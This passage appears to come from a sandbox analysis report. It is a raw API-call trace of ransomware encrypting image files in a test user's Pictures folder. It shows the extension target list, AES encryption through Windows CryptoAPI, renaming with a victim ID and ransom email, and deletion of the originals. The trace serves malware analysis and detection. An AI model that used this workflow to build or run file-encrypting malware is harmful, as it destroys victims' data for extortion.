b.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".png") returned=".png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0195.415] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0195.416] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0195.416] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\7aqvlowxb6rold9vria4.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\7aqvlowxb6rold9vria4.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0195.427] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x12491, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x12491, lpOverlapped=0x0) returned 1
	[0195.431] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.431] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb220) returned 1
	[0195.434] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.435] CryptCreateHash (in: hProv=0xfcb220, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0195.435] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.435] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0195.435] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.435] CryptDeriveKey (in: hProv=0xfcb220, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9b30) returned 1
	[0195.435] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.436] CryptEncrypt (in: hKey=0xfb9b30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x12491, dwBufLen=0x12491 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x124a0) returned 1
	[0195.438] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.438] RtlMoveMemory (in: Destination=0xfef620, Source=0xfdd180, Length=0x12491 | out: Destination=0xfef620) 
	[0195.438] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.439] CryptEncrypt (in: hKey=0xfb9b30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfef620*, pdwDataLen=0x18bc0c*=0x12491, dwBufLen=0x124a0 | out: pbData=0xfef620*, pdwDataLen=0x18bc0c*=0x124a0) returned 1
	[0195.441] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.441] CryptDestroyKey (hKey=0xfb9b30) returned 1
	[0195.441] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.441] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0195.441] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.442] CryptReleaseContext (hProv=0xfcb220, dwFlags=0x0) returned 1
	[0195.442] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.442] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0195.443] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.443] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0195.444] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\pictures\\7aqvlowxb6rold9vria4.png.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 97
	[0195.444] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\7aqvlowxb6rold9vria4.png.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\7aqvlowxb6rold9vria4.png.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0195.445] WriteFile (in: hFile=0x2c0, lpBuffer=0xfef620*, nNumberOfBytesToWrite=0x124a0, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfef620*, lpNumberOfBytesWritten=0x18c068*=0x124a0, lpOverlapped=0x0) returned 1
	[0195.452] CloseHandle (hObject=0x2c0) returned 1
	[0195.452] CloseHandle (hObject=0x384) returned 1
	[0195.452] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\7aqvlowxb6rold9vria4.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\7aqvlowxb6rold9vria4.png")) returned 1
	[0195.461] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\7aqvlowxb6rold9vria4.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\7aqvlowxb6rold9vria4.png")) returned 0
	[0195.461] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x496bf140, ftCreationTime.dwHighDateTime=0x1d9693e, ftLastAccessTime.dwLowDateTime=0x14e10860, ftLastAccessTime.dwHighDateTime=0x1d97010, ftLastWriteTime.dwLowDateTime=0x14e10860, ftLastWriteTime.dwHighDateTime=0x1d97010, nFileSizeHigh=0x0, nFileSizeLow=0x7601, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7N6B8iI7I7.gif", cAlternateFileName="7N6B8I~1.GIF")) returned 1
	[0195.461] lstrcmpW (lpString1="7N6B8iI7I7.gif", lpString2="..") returned 1
	[0195.461] lstrcmpW (lpString1="7N6B8iI7I7.gif", lpString2=".") returned 1
	[0195.461] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\"
	[0195.461] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\", lpString2="7N6B8iI7I7.gif" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\7N6B8iI7I7.gif") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\7N6B8iI7I7.gif"
	[0195.461] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\7N6B8iI7I7.gif") returned 45
	[0195.462] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0195.462] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\7N6B8iI7I7.gif", cchLength=0x2d | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\7n6b8ii7i7.gif") returned 0x2d
	[0195.462] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.462] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\7n6b8ii7i7.gif", lpSrch="help_decrypt_your_files") returned 0x0
	[0195.462] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\pictures\\7n6b8ii7i7.gif" | out: lpString1="c:\\users\\rdhj0cnfevzx\\pictures\\7n6b8ii7i7.gif") returned="c:\\users\\rdhj0cnfevzx\\pictures\\7n6b8ii7i7.gif"
	[0195.462] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\pictures\\7n6b8ii7i7.gif") returned 45
	[0195.462] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.463] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.464] StrStrW (lpFirst=".gif", lpSrch=".") returned=".gif"
	[0195.464] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.464] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".gif") returned=".gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0195.464] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0195.464] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0195.465] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\7n6b8ii7i7.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\7n6b8ii7i7.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0195.468] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x7601, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x7601, lpOverlapped=0x0) returned 1
	[0195.471] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.471] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb770) returned 1
	[0195.474] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.474] CryptCreateHash (in: hProv=0xfcb770, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0195.474] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.474] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0195.474] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.474] CryptDeriveKey (in: hProv=0xfcb770, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb98f0) returned 1
	[0195.474] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.475] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x7601, dwBufLen=0x7601 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x7610) returned 1
	[0195.476] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.476] RtlMoveMemory (in: Destination=0xfe4790, Source=0xfdd180, Length=0x7601 | out: Destination=0xfe4790) 
	[0195.476] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
